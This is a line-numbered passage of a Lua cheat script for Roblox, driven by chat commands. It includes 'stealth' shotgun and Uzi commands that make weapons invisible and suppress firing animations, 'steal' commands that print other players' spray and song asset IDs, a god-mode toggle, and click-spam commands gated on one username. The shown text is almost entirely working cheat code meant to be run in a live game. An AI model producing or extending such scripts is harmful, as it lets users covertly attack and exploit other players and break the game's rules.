  2548. game.Players.LocalPlayer.Character.Shotty.Activated:Connect(function()
  2549. wait()
  2550. local AnimationTracks = game.Players.LocalPlayer.Character.Humanoid:GetPlayingAnimationTracks()
  2551. for i, track in pairs (AnimationTracks) do
  2552. if track.Name == "Fires" then
  2553. track:Stop()
  2554. end
  2555. end
  2556. end)
  2557.  
  2558. wait(1.5)
  2559. if game.Players.LocalPlayer.Character:FindFirstChild("Shotty") then
  2560. game.Players.LocalPlayer.Character.Shotty.Parent = game.Players.LocalPlayer.Backpack
  2561. end
  2562.  
  2563.  
  2564. end
  2565.  
  2566. if lower == "/e :stealthshotty" then
  2567.  
  2568. if game.Players.LocalPlayer.Backpack:FindFirstChild("Shotty") then
  2569. game.Players.LocalPlayer.Backpack:FindFirstChild("Shotty").Parent = game.Players.LocalPlayer.Character
  2570. end
  2571. wait(0.1)
  2572. invis(game.Players.LocalPlayer.Character.Shotty)
  2573. game.Players.LocalPlayer.Character.Shotty.Grip = CFrame.new(-0.2,0,-3)
  2574.  
  2575.  
  2576. game.Players.LocalPlayer.Character.Shotty.Equipped:Connect(function()
  2577. wait()
  2578. local AnimationTracks = game.Players.LocalPlayer.Character.Humanoid:GetPlayingAnimationTracks()
  2579. for i, track in pairs (AnimationTracks) do
  2580. if track.Name == "Idle" then
  2581. track:Stop()
  2582. end
  2583. end
  2584. wait(0.7)
  2585. local AnimationTracks = game.Players.LocalPlayer.Character.Humanoid:GetPlayingAnimationTracks()
  2586. for i, track in pairs (AnimationTracks) do
  2587. if track.Name == "Idle" or string.find(track.Name, "Animation") then
  2588. track:Stop()
  2589. end
  2590. end
  2591. end)
  2592. game.Players.LocalPlayer.Character.Shotty.Activated:Connect(function()
  2593. wait()
  2594. local AnimationTracks = game.Players.LocalPlayer.Character.Humanoid:GetPlayingAnimationTracks()
  2595. for i, track in pairs (AnimationTracks) do
  2596. if track.Name == "Fires" then
  2597. track:Stop()
  2598. end
  2599. end
  2600. end)
  2601.  
  2602. wait(1.5)
  2603. if game.Players.LocalPlayer.Character:FindFirstChild("Shotty") then
  2604. game.Players.LocalPlayer.Character.Shotty.Parent = game.Players.LocalPlayer.Backpack
  2605. end
  2606.  
  2607.  
  2608. end
  2609.  
  2610.  
  2611.  
  2612.  
  2613. if lower == ":stealthuzi" then
  2614.  
  2615. if game.Players.LocalPlayer.Backpack:FindFirstChild("Uzi") then
  2616. game.Players.LocalPlayer.Backpack:FindFirstChild("Uzi").Parent = game.Players.LocalPlayer.Character
  2617. end
  2618. wait(0.1)
  2619. invis(game.Players.LocalPlayer.Character.Uzi)
  2620. game.Players.LocalPlayer.Character.Uzi.Grip = CFrame.new(-0.2,0,-3)
  2621.  
  2622.  
  2623. game.Players.LocalPlayer.Character.Uzi.Equipped:Connect(function()
  2624. wait()
  2625. local AnimationTracks = game.Players.LocalPlayer.Character.Humanoid:GetPlayingAnimationTracks()
  2626. for i, track in pairs (AnimationTracks) do
  2627. if track.Name == "Idle" or string.find(track.Name, "Animation") then
  2628. track:Stop()
  2629. end
  2630. end
  2631. wait(0.3)
  2632. local AnimationTracks = game.Players.LocalPlayer.Character.Humanoid:GetPlayingAnimationTracks()
  2633. for i, track in pairs (AnimationTracks) do
  2634. if track.Name == "Idle" or string.find(track.Name, "Animation") then
  2635. track:Stop()
  2636. end
  2637. end
  2638. end)
  2639. game.Players.LocalPlayer.Character.Uzi.Activated:Connect(function()
  2640. wait()
  2641. local AnimationTracks = game.Players.LocalPlayer.Character.Humanoid:GetPlayingAnimationTracks()
  2642. for i, track in pairs (AnimationTracks) do
  2643. if track.Name == "Fires" then
  2644. track:Stop()
  2645. end
  2646. end
  2647. end)
  2648.  
  2649. wait(1.5)
  2650. if game.Players.LocalPlayer.Character:FindFirstChild("Uzi") then
  2651. game.Players.LocalPlayer.Character.Uzi.Parent = game.Players.LocalPlayer.Backpack
  2652. end
  2653.  
  2654.  
  2655. end
  2656.  
  2657.  
  2658.  
  2659.  
  2660. if lower == "/e stealthuzi" then
  2661.  
  2662. if game.Players.LocalPlayer.Backpack:FindFirstChild("Uzi") then
  2663. game.Players.LocalPlayer.Backpack:FindFirstChild("Uzi").Parent = game.Players.LocalPlayer.Character
  2664. end
  2665. wait(0.1)
  2666. invis(game.Players.LocalPlayer.Character.Uzi)
  2667. game.Players.LocalPlayer.Character.Uzi.Grip = CFrame.new(-0.2,0,-3)
  2668.  
  2669.  
  2670. game.Players.LocalPlayer.Character.Uzi.Equipped:Connect(function()
  2671. wait()
  2672. local AnimationTracks = game.Players.LocalPlayer.Character.Humanoid:GetPlayingAnimationTracks()
  2673. for i, track in pairs (AnimationTracks) do
  2674. if track.Name == "Idle" or string.find(track.Name, "Animation") then
  2675. track:Stop()
  2676. end
  2677. end
  2678. wait(0.3)
  2679. local AnimationTracks = game.Players.LocalPlayer.Character.Humanoid:GetPlayingAnimationTracks()
  2680. for i, track in pairs (AnimationTracks) do
  2681. if track.Name == "Idle" or string.find(track.Name, "Animation") then
  2682. track:Stop()
  2683. end
  2684. end
  2685. end)
  2686. game.Players.LocalPlayer.Character.Uzi.Activated:Connect(function()
  2687. wait()
  2688. local AnimationTracks = game.Players.LocalPlayer.Character.Humanoid:GetPlayingAnimationTracks()
  2689. for i, track in pairs (AnimationTracks) do
  2690. if track.Name == "Fires" then
  2691. track:Stop()
  2692. end
  2693. end
  2694. end)
  2695.  
  2696. wait(1.5)
  2697. if game.Players.LocalPlayer.Character:FindFirstChild("Uzi") then
  2698. game.Players.LocalPlayer.Character.Uzi.Parent = game.Players.LocalPlayer.Backpack
  2699. end
  2700.  
  2701.  
  2702. end
  2703.  
  2704.  
  2705.  
  2706. if lower == "/e :stealthuzi" then
  2707.  
  2708. if game.Players.LocalPlayer.Backpack:FindFirstChild("Uzi") then
  2709. game.Players.LocalPlayer.Backpack:FindFirstChild("Uzi").Parent = game.Players.LocalPlayer.Character
  2710. end
  2711. wait(0.1)
  2712. invis(game.Players.LocalPlayer.Character.Uzi)
  2713. game.Players.LocalPlayer.Character.Uzi.Grip = CFrame.new(-0.2,0,-3)
  2714.  
  2715.  
  2716. game.Players.LocalPlayer.Character.Uzi.Equipped:Connect(function()
  2717. wait()
  2718. local AnimationTracks = game.Players.LocalPlayer.Character.Humanoid:GetPlayingAnimationTracks()
  2719. for i, track in pairs (AnimationTracks) do
  2720. if track.Name == "Idle" or string.find(track.Name, "Animation") then
  2721. track:Stop()
  2722. end
  2723. end
  2724. wait(0.3)
  2725. local AnimationTracks = game.Players.LocalPlayer.Character.Humanoid:GetPlayingAnimationTracks()
  2726. for i, track in pairs (AnimationTracks) do
  2727. if track.Name == "Idle" or string.find(track.Name, "Animation") then
  2728. track:Stop()
  2729. end
  2730. end
  2731. end)
  2732. game.Players.LocalPlayer.Character.Uzi.Activated:Connect(function()
  2733. wait()
  2734. local AnimationTracks = game.Players.LocalPlayer.Character.Humanoid:GetPlayingAnimationTracks()
  2735. for i, track in pairs (AnimationTracks) do
  2736. if track.Name == "Fires" then
  2737. track:Stop()
  2738. end
  2739. end
  2740. end)
  2741.  
  2742. wait(1.5)
  2743. if game.Players.LocalPlayer.Character:FindFirstChild("Uzi") then
  2744. game.Players.LocalPlayer.Character.Uzi.Parent = game.Players.LocalPlayer.Backpack
  2745. end
  2746.  
  2747.  
  2748. end
  2749.  
  2750.  
  2751.  
  2752.  
  2753.  
  2754. if string.find(lower,":spray ") then
  2755. local playername = string.gsub(lower,":spray ","")
  2756. local tarplayer = findplayer(playername)
  2757. if tarplayer ~= false then
  2758. if game.Workspace:FindFirstChild(tarplayer.Name.."Spray") then
  2759. if game.Workspace:FindFirstChild(tarplayer.Name.."Spray"):FindFirstChildOfClass("Decal") then
  2760. print(tostring(game.Workspace:FindFirstChild(tarplayer.Name.."Spray"):FindFirstChildOfClass("Decal").Texture))
  2761. end
  2762. end
  2763. end
  2764. end
  2765.  
  2766. if string.find(lower,"/e spray ") then
  2767. local playername = string.gsub(lower,"/e spray ","")
  2768. local tarplayer = findplayer(playername)
  2769. if tarplayer ~= false then
  2770. if game.Workspace:FindFirstChild(tarplayer.Name.."Spray") then
  2771. if game.Workspace:FindFirstChild(tarplayer.Name.."Spray"):FindFirstChildOfClass("Decal") then
  2772. print(tostring(game.Workspace:FindFirstChild(tarplayer.Name.."Spray"):FindFirstChildOfClass("Decal").Texture))
  2773. end
  2774. end
  2775. end
  2776. end
  2777.  
  2778. if string.find(lower,"/e :spray ") then
  2779. local playername = string.gsub(lower,"/e :spray ","")
  2780. local tarplayer = findplayer(playername)
  2781. if tarplayer ~= false then
  2782. if game.Workspace:FindFirstChild(tarplayer.Name.."Spray") then
  2783. if game.Workspace:FindFirstChild(tarplayer.Name.."Spray"):FindFirstChildOfClass("Decal") then
  2784. print(tostring(game.Workspace:FindFirstChild(tarplayer.Name.."Spray"):FindFirstChildOfClass("Decal").Texture))
  2785. end
  2786. end
  2787. end
  2788. end
  2789.  
  2790. if string.find(lower,":stealspray ") then
  2791. local playername = string.gsub(lower,":stealspray ","")
  2792. local tarplayer = findplayer(playername)
  2793. if tarplayer ~= false then
  2794. if game.Workspace:FindFirstChild(tarplayer.Name.."Spray") then
  2795. if game.Workspace:FindFirstChild(tarplayer.Name.."Spray"):FindFirstChildOfClass("Decal") then
  2796. print(tostring(game.Workspace:FindFirstChild(tarplayer.Name.."Spray"):FindFirstChildOfClass("Decal").Texture))
  2797. end
  2798. end
  2799. end
  2800. end
  2801.  
  2802. if string.find(lower,"/e stealspray ") then
  2803. local playername = string.gsub(lower,"/e stealspray ","")
  2804. local tarplayer = findplayer(playername)
  2805. if tarplayer ~= false then
  2806. if game.Workspace:FindFirstChild(tarplayer.Name.."Spray") then
  2807. if game.Workspace:FindFirstChild(tarplayer.Name.."Spray"):FindFirstChildOfClass("Decal") then
  2808. print(tostring(game.Workspace:FindFirstChild(tarplayer.Name.."Spray"):FindFirstChildOfClass("Decal").Texture))
  2809. end
  2810. end
  2811. end
  2812. end
  2813.  
  2814. if string.find(lower,"/e :stealspray ") then
  2815. local playername = string.gsub(lower,"/e :stealspray ","")
  2816. local tarplayer = findplayer(playername)
  2817. if tarplayer ~= false then
  2818. if game.Workspace:FindFirstChild(tarplayer.Name.."Spray") then
  2819. if game.Workspace:FindFirstChild(tarplayer.Name.."Spray"):FindFirstChildOfClass("Decal") then
  2820. print(tostring(game.Workspace:FindFirstChild(tarplayer.Name.."Spray"):FindFirstChildOfClass("Decal").Texture))
  2821. end
  2822. end
  2823. end
  2824. end
  2825.  
  2826.  
  2827. if string.find(lower,":song ") then
  2828. local playername = string.gsub(lower,":song ","")
  2829. local tarplayer = findplayer(playername)
  2830. if tarplayer ~= false then
  2831. if tarplayer.Character ~= nil then
  2832. if tarplayer.Character:FindFirstChild("Torso") then
  2833. if tarplayer.Character.Torso:FindFirstChildOfClass("Sound") then
  2834. print(tarplayer.Name.." : "..tostring(tarplayer.Character.Torso:FindFirstChildOfClass("Sound").SoundId))
  2835. end
  2836. end
  2837. end
  2838. end
  2839. end
  2840.  
  2841. if string.find(lower,"/e song ") then
  2842. local playername = string.gsub(lower,"/e song ","")
  2843. local tarplayer = findplayer(playername)
  2844. if tarplayer ~= false then
  2845. if tarplayer.Character ~= nil then
  2846. if tarplayer.Character:FindFirstChild("Torso") then
  2847. if tarplayer.Character.Torso:FindFirstChildOfClass("Sound") then
  2848. print(tarplayer.Name.." : "..tostring(tarplayer.Character.Torso:FindFirstChildOfClass("Sound").SoundId))
  2849. end
  2850. end
  2851. end
  2852. end
  2853. end
  2854.  
  2855. if string.find(lower,"/e :song ") then
  2856. local playername = string.gsub(lower,"/e :song ","")
  2857. local tarplayer = findplayer(playername)
  2858. if tarplayer ~= false then
  2859. if tarplayer.Character ~= nil then
  2860. if tarplayer.Character:FindFirstChild("Torso") then
  2861. if tarplayer.Character.Torso:FindFirstChildOfClass("Sound") then
  2862. print(tarplayer.Name.." : "..tostring(tarplayer.Character.Torso:FindFirstChildOfClass("Sound").SoundId))
  2863. end
  2864. end
  2865. end
  2866. end
  2867. end
  2868.  
  2869.  
  2870. if string.find(lower,":stealsong ") then
  2871. local playername = string.gsub(lower,":stealsong ","")
  2872. local tarplayer = findplayer(playername)
  2873. if tarplayer ~= false then
  2874. if tarplayer.Character ~= nil then
  2875. if tarplayer.Character:FindFirstChild("Torso") then
  2876. if tarplayer.Character.Torso:FindFirstChildOfClass("Sound") then
  2877. print(tarplayer.Name.." : "..tostring(tarplayer.Character.Torso:FindFirstChildOfClass("Sound").SoundId))
  2878. end
  2879. end
  2880. end
  2881. end
  2882. end
  2883.  
  2884. if string.find(lower,"/e stealsong ") then
  2885. local playername = string.gsub(lower,"/e stealsong ","")
  2886. local tarplayer = findplayer(playername)
  2887. if tarplayer ~= false then
  2888. if tarplayer.Character ~= nil then
  2889. if tarplayer.Character:FindFirstChild("Torso") then
  2890. if tarplayer.Character.Torso:FindFirstChildOfClass("Sound") then
  2891. print(tarplayer.Name.." : "..tostring(tarplayer.Character.Torso:FindFirstChildOfClass("Sound").SoundId))
  2892. end
  2893. end
  2894. end
  2895. end
  2896. end
  2897.  
  2898. if string.find(lower,"/e :stealsong ") then
  2899. local playername = string.gsub(lower,"/e :stealsong ","")
  2900. local tarplayer = findplayer(playername)
  2901. if tarplayer ~= false then
  2902. if tarplayer.Character ~= nil then
  2903. if tarplayer.Character:FindFirstChild("Torso") then
  2904. if tarplayer.Character.Torso:FindFirstChildOfClass("Sound") then
  2905. print(tarplayer.Name.." : "..tostring(tarplayer.Character.Torso:FindFirstChildOfClass("Sound").SoundId))
  2906. end
  2907. end
  2908. end
  2909. end
  2910. end
  2911.  
  2912.  
  2913. if lower == ":stopanims" then
  2914. local AnimationTracks = game.Players.LocalPlayer.Character.Humanoid:GetPlayingAnimationTracks()
  2915. for i, track in pairs (AnimationTracks) do
  2916. track:Stop()
  2917. end
  2918. end
  2919.  
  2920. if lower == "/e stopanims" then
  2921. local AnimationTracks = game.Players.LocalPlayer.Character.Humanoid:GetPlayingAnimationTracks()
  2922. for i, track in pairs (AnimationTracks) do
  2923. track:Stop()
  2924. end
  2925. end
  2926.  
  2927. if lower == "/e :stopanims" then
  2928. local AnimationTracks = game.Players.LocalPlayer.Character.Humanoid:GetPlayingAnimationTracks()
  2929. for i, track in pairs (AnimationTracks) do
  2930. track:Stop()
  2931. end
  2932. end
  2933.  
  2934. if lower == ":god" then
  2935. godmode = true
  2936. if game.Players.LocalPlayer.Character ~= nil then
  2937. game.Players.LocalPlayer.Character:BreakJoints()
  2938. end
  2939. end
  2940. if lower == "/e god" then
  2941. godmode = true
  2942. if game.Players.LocalPlayer.Character ~= nil then
  2943. game.Players.LocalPlayer.Character:BreakJoints()
  2944. end
  2945. end
  2946. if lowerf == "/e :god" then
  2947. godmode = true
  2948. if game.Players.LocalPlayer.Character ~= nil then
  2949. game.Players.LocalPlayer.Character:BreakJoints()
  2950. end
  2951. end
  2952.  
  2953.  
  2954. if lower == ":ungod" then
  2955. godmode = false
  2956. if game.Players.LocalPlayer.Character ~= nil then
  2957. game.Players.LocalPlayer.Character:BreakJoints()
  2958. end
  2959. end
  2960. if lower == "/e ungod" then
  2961. godmode = false
  2962. if game.Players.LocalPlayer.Character ~= nil then
  2963. game.Players.LocalPlayer.Character:BreakJoints()
  2964. end
  2965. end
  2966. if lower == "/e :ungod" then
  2967. godmode = false
  2968. if game.Players.LocalPlayer.Character ~= nil then
  2969. game.Players.LocalPlayer.Character:BreakJoints()
  2970. end
  2971. end
  2972.  
  2973.  
  2974. if lower == ":donate" then
  2975. CreateDonationGUI()
  2976. end
  2977.  
  2978. if lower == "/e donate" then
  2979. CreateDonationGUI()
  2980. end
  2981.  
  2982. if lower == "/e :donate" then
  2983. CreateDonationGUI()
  2984. end
  2985.  
  2986.  
  2987. if lower == ":disc" then
  2988. discordlink()
  2989. end
  2990.  
  2991. if lower == "/e disc" then
  2992. discordlink()
  2993. end
  2994.  
  2995. if lower == "/e :disc" then
  2996. discordlink()
  2997. end
  2998.  
  2999.  
  3000.  
  3001. if lower == ":discord" then
  3002. discordlink()
  3003. end
  3004.  
  3005. if lower == "/e discord" then
  3006. discordlink()
  3007. end
  3008.  
  3009. if lower == "/e :discord" then
  3010. discordlink()
  3011. end
  3012.  
  3013. if string.find(lower,":visualize") then
  3014. local firstspace = string.find(lower, " ")
  3015. local toolnames = string.sub(lower, firstspace + 1, -1)
  3016. if string.find(toolnames, " ") and not godmode then
  3017. promptgod()
  3018. return
  3019. end
  3020. visualize = false
  3021. for i = 1,#visualizetools do
  3022. table.remove(visualizetools, 1)
  3023. end
  3024. if game.Players.LocalPlayer.Character ~= nil then
  3025. for i,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  3026. if v:IsA("Tool") then
  3027. v.Parent = game.Players.LocalPlayer.Backpack
  3028. end
  3029. end
  3030. end
  3031. wait()
  3032. local mode = string.sub(string.gsub(lower, ":visualize", ""), 1, 1)
  3033. if string.sub(mode, 1, 1) == " " then
  3034. -- Nothing needs to be done
  3035. elseif string.match(mode, "%d") then
  3036. local secondplace = string.sub(string.gsub(lower, ":visualize", ""), 2, 2)
  3037. if string.match(secondplace, "%d") then
  3038. local doubledigit = string.sub(string.gsub(lower, ":visualize", ""), 0, 2)
  3039. visualizemode = tonumber(doubledigit)
  3040. else
  3041. visualizemode = tonumber(mode)
  3042. end
  3043. end
  3044. while wait() do
  3045. if string.sub(toolnames, 1, 1) == " " then
  3046. break
  3047. end
  3048. if string.find(toolnames, " ") then
  3049. local space = string.find(toolnames, " ")
  3050. local toolname = string.sub(toolnames, 0, space - 1)
  3051. toolnames = string.sub(toolnames, space + 1, -1)
  3052. if string.lower(toolname) == "hats" then
  3053. table.insert(visualizetools, #visualizetools + 1, "hat")
  3054. else
  3055. table.insert(visualizetools, #visualizetools + 1, toolname)
  3056. end
  3057. else
  3058. local lasttoolname = string.sub(toolnames, 0, -1)
  3059. if string.lower(lasttoolname) == "hats" then
  3060. table.insert(visualizetools, #visualizetools + 1, "hat")
  3061. break
  3062. else
  3063. table.insert(visualizetools, #visualizetools + 1, lasttoolname)
  3064. break
  3065. end
  3066. end
  3067. end
  3068. visualize = true
  3069. end
  3070.  
  3071. if string.find(lower,"/e visualize") then
  3072. local firstspace = string.find(lower, " ", 4)
  3073. local toolnames = string.sub(lower, firstspace + 1, -1)
  3074. if string.find(toolnames, " ") and not godmode then
  3075. promptgod()
  3076. return
  3077. end
  3078. visualize = false
  3079. for i = 1,#visualizetools do
  3080. table.remove(visualizetools, 1)
  3081. end
  3082. if game.Players.LocalPlayer.Character ~= nil then
  3083. for i,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  3084. if v:IsA("Tool") then
  3085. v.Parent = game.Players.LocalPlayer.Backpack
  3086. end
  3087. end
  3088. end
  3089. wait()
  3090. local mode = string.sub(string.gsub(lower, "/e visualize", ""), 1, 1)
  3091. if string.sub(mode, 1, 1) == " " then
  3092. -- Nothing needs to be done
  3093. elseif string.match(mode, "%d") then
  3094. local secondplace = string.sub(string.gsub(lower, "/e visualize", ""), 2, 2)
  3095. if string.match(secondplace, "%d") then
  3096. local doubledigit = string.sub(string.gsub(lower, "/e visualize", ""), 0, 2)
  3097. visualizemode = tonumber(doubledigit)
  3098. else
  3099. visualizemode = tonumber(mode)
  3100. end
  3101. end
  3102. while wait() do
  3103. if string.sub(toolnames, 1, 1) == " " then
  3104. break
  3105. end
  3106. if string.find(toolnames, " ") then
  3107. local space = string.find(toolnames, " ")
  3108. local toolname = string.sub(toolnames, 0, space - 1)
  3109. toolnames = string.sub(toolnames, space + 1, -1)
  3110. if string.lower(toolname) == "hats" then
  3111. table.insert(visualizetools, #visualizetools + 1, "hat")
  3112. else
  3113. table.insert(visualizetools, #visualizetools + 1, toolname)
  3114. end
  3115. else
  3116. local lasttoolname = string.sub(toolnames, 0, -1)
  3117. if string.lower(lasttoolname) == "hats" then
  3118. table.insert(visualizetools, #visualizetools + 1, "hat")
  3119. break
  3120. else
  3121. table.insert(visualizetools, #visualizetools + 1, lasttoolname)
  3122. break
  3123. end
  3124. end
  3125. end
  3126. visualize = true
  3127. for i = 1,#visualizetools do
  3128. end
  3129. end
  3130.  
  3131. if string.find(lower,"/e :visualize") then
  3132. local firstspace = string.find(lower, " ", 4)
  3133. local toolnames = string.sub(lower, firstspace + 1, -1)
  3134. if string.find(toolnames, " ") and not godmode then
  3135. promptgod()
  3136. return
  3137. end
  3138. visualize = false
  3139. for i = 1,#visualizetools do
  3140. table.remove(visualizetools, 1)
  3141. end
  3142. if game.Players.LocalPlayer.Character ~= nil then
  3143. for i,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  3144. if v:IsA("Tool") then
  3145. v.Parent = game.Players.LocalPlayer.Backpack
  3146. end
  3147. end
  3148. end
  3149. wait()
  3150. local mode = string.sub(string.gsub(lower, "/e :visualize", ""), 1, 1)
  3151. if string.sub(mode, 1, 1) == " " then
  3152. -- Nothing needs to be done
  3153. elseif string.match(mode, "%d") then
  3154. local secondplace = string.sub(string.gsub(lower, "/e :visualize", ""), 2, 2)
  3155. if string.match(secondplace, "%d") then
  3156. local doubledigit = string.sub(string.gsub(lower, "/e :visualize", ""), 0, 2)
  3157. visualizemode = tonumber(doubledigit)
  3158. else
  3159. visualizemode = tonumber(mode)
  3160. end
  3161. end
  3162. while wait() do
  3163. if string.sub(toolnames, 1, 1) == " " then
  3164. break
  3165. end
  3166. if string.find(toolnames, " ") then
  3167. local space = string.find(toolnames, " ")
  3168. local toolname = string.sub(toolnames, 0, space - 1)
  3169. toolnames = string.sub(toolnames, space + 1, -1)
  3170. if string.lower(toolname) == "hats" then
  3171. table.insert(visualizetools, #visualizetools + 1, "hat")
  3172. else
  3173. table.insert(visualizetools, #visualizetools + 1, toolname)
  3174. end
  3175. else
  3176. local lasttoolname = string.sub(toolnames, 0, -1)
  3177. if string.lower(lasttoolname) == "hats" then
  3178. table.insert(visualizetools, #visualizetools + 1, "hat")
  3179. break
  3180. else
  3181. table.insert(visualizetools, #visualizetools + 1, lasttoolname)
  3182. break
  3183. end
  3184. end
  3185. end
  3186. visualize = true
  3187. end
  3188.  
  3189. if lower == ":unvisualize" then
  3190. visualize = false
  3191. for i = 1,#visualizetools do
  3192. table.remove(visualizetools, i)
  3193. end
  3194. if game.Players.LocalPlayer.Character ~= nil then
  3195. for i,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  3196. if v:IsA("Tool") then
  3197. v.Parent = game.Players.LocalPlayer.Backpack
  3198. end
  3199. end
  3200. end
  3201. end
  3202.  
  3203.  
  3204. if lower == "/e unvisualize" then
  3205. visualize = false
  3206. for i = 1,#visualizetools do
  3207. table.remove(visualizetools, i)
  3208. end
  3209. if game.Players.LocalPlayer.Character ~= nil then
  3210. for i,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  3211. if v:IsA("Tool") then
  3212. v.Parent = game.Players.LocalPlayer.Backpack
  3213. end
  3214. end
  3215. end
  3216. end
  3217.  
  3218. if lower == "/e :unvisualize" then
  3219. visualize = false
  3220. for i = 1,#visualizetools do
  3221. table.remove(visualizetools, i)
  3222. end
  3223. if game.Players.LocalPlayer.Character ~= nil then
  3224. for i,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  3225. if v:IsA("Tool") then
  3226. v.Parent = game.Players.LocalPlayer.Backpack
  3227. end
  3228. end
  3229. end
  3230. end
  3231.  
  3232. if string.find(lower,":vismode ") then
  3233. local input = string.gsub(lower, ":vismode ", "")
  3234. if not string.match(input, "%a") then
  3235. visualizemode = tonumber(input)
  3236. end
  3237. end
  3238.  
  3239. if string.find(lower,"/e vismode ") then
  3240. local input = string.gsub(lower, "/e vismode ", "")
  3241. if not string.match(input, "%a") then
  3242. visualizemode = tonumber(input)
  3243. end
  3244. end
  3245.  
  3246. if string.find(lower,"/e :vismode ") then
  3247. local input = string.gsub(lower, "/e :vismode ", "")
  3248. if not string.match(input, "%a") then
  3249. visualizemode = tonumber(input)
  3250. end
  3251. end
  3252.  
  3253.  
  3254.  
  3255. if lower == ":clickspam" and game.Players.LocalPlayer.Name == "Vortexturize" then
  3256. clickspam = true
  3257. elseif lower == ":clickspam" and not game.Players:FindFirstChild("Vortexturize") then
  3258. clickspam = true
  3259. end
  3260. if lower == "/e clickspam" and game.Players.LocalPlayer.Name == "Vortexturize" then
  3261. clickspam = true
  3262. elseif lower == "/e clickspam" and not game.Players:FindFirstChild("Vortexturize") then
  3263. clickspam = true
  3264. end
  3265.  
  3266. if lower == "/e :clickspam" and game.Players.LocalPlayer.Name == "Vortexturize" then
  3267. clickspam = true
  3268. elseif lower == "/e :clickspam" and not game.Players:FindFirstChild("Vortexturize") then
  3269. clickspam = true
  3270. end
  3271.  
  3272.  
  3273.  
  3274. if lower == ":unclickspam" then
  3275. clickspam = false
  3276. end
  3277.  
  3278. if lower == ":unclickspam" then
  3279. clickspam = false
  3280. end
  3281.  
  3282. if lower == ":unclickspam" then
  3283. clickspam = false
  3284. end
  3285.  
  3286. if lower == ":stopmusic" and game.Players.LocalPlayer.Name == "Vortexturize" then
  3287. if debunce == false then
  3288. debunce = true
  3289. clickspam = true
  3290. wait(1)
  3291. clickspam = false
  3292. debunce = false
  3293. end
  3294. elseif lower == ":stopmusic" and not game.Players:FindFirstChild("Vortexturize") then
  3295. if debunce == false then
  3296. debunce = true
  3297. clickspam = true
  3298. wait(1)
  3299. clickspam = false
  3300. debunce = false
  3301. end
  3302. end
  3303.  
  3304.  
  3305. if lower == "/e stopmusic" and game.Players.LocalPlayer.Name == "Vortexturize" then
  3306. if debunce == false then
  3307. debunce = true
  3308. clickspam = true
  3309. wait(1)
  3310. clickspam = false
  3311. debunce = false
  3312. end
  3313. elseif lower == "/e stopmusic" and not game.Players:FindFirstChild("Vortexturize") then
  3314. if debunce == false then
  3315. debunce = true
  3316. clickspam = true
  3317. wait(1)
  3318. clickspam = false
  3319. debunce = false
  3320. end
  3321. end
  3322.  
  3323.  
  3324. if lower == "/e :stopmusic" and game.Players.LocalPlayer.Name == "Vortexturize" then
  3325. if debunce == false then
  3326. debunce = true
  3327. clickspam = true
  3328. wait(1)
  3329. clickspam = false
  3330. debunce = false
  3331. end
  3332. elseif lower == "/e :stopmusic" and not game.Players:FindFirstChild("Vortexturize") then
  3333. if debunce == false then
  3334. debunce = true
  3335. clickspam = true
  3336. wait(1)
  3337. clickspam = false
  3338. debunce = false
  3339. end
  3340. end
  3341.  
  3342.  
  3343. if lower == ":fixmusic" then
  3344. if game.Players.LocalPlayer.Character ~= nil then
  3345. if game.Players.LocalPlayer.Character:FindFirstChild("HumanoidRootPart") then
  3346. local returnto = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
  3347. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(0,math.huge,0)
  3348. wait()
  3349. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = returnto
  3350. end
  3351. end
  3352. end
  3353.  
  3354. if lower == "/e fixmusic" then
  3355. if game.Players.LocalPlayer.Character ~= nil then
  3356. if game.Players.LocalPlayer.Character:FindFirstChild("HumanoidRootPart") then
  3357. local returnto = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
  3358. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(0,math.huge,0)
  3359. wait()
  3360. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = returnto
  3361. end
  3362. end
  3363. end
  3364.  
  3365. if lower == "/e :fixmusic" then
  3366. if game.Players.LocalPlayer.Character ~= nil then
  3367. if game.Players.LocalPlayer.Character:FindFirstChild("HumanoidRootPart") then
  3368. local returnto = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
  3369. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(0,math.huge,0)
  3370. wait()
  3371. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = returnto
  3372. end
  3373. end
  3374. end
  3375.  
  3376.  
  3377. if lower == ":fix" then
  3378. if game.Players.LocalPlayer.Character ~= nil then
  3379. if game.Players.LocalPlayer.Character:FindFirstChild("HumanoidRootPart") then
  3380. local returnto = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
  3381. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(0,math.huge,0)
  3382. wait()
  3383. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = returnto
  3384. end
  3385. end
  3386. end
  3387. if lower == "/e fix" then
  3388. if game.Players.LocalPlayer.Character ~= nil then
  3389. if game.Players.LocalPlayer.Character:FindFirstChild("HumanoidRootPart") then
  3390. local returnto = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
  3391. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(0,math.huge,0)
  3392. wait()
  3393. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = returnto
  3394. end
  3395. end
  3396. end
  3397. if lower == "/e :fix" then
  3398. if game.Players.LocalPlayer.Character ~= nil then
  3399. if game.Players.LocalPlayer.Character:FindFirstChild("HumanoidRootPart") then
  3400. local returnto = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
  3401. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(0,math.huge,0)
  3402. wait()
  3403. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = returnto
  3404. end
  3405. end
  3406. end
  3407.  
  3408. if lower == ":reset" then
  3409. if game.Players.LocalPlayer.Character ~= nil then
  3410. if game.Players.LocalPlayer.Character:FindFirstChild("Torso") then
  3411. if game.Players.LocalPlayer.Character.Torso:FindFirstChildOfClass("Glue") then
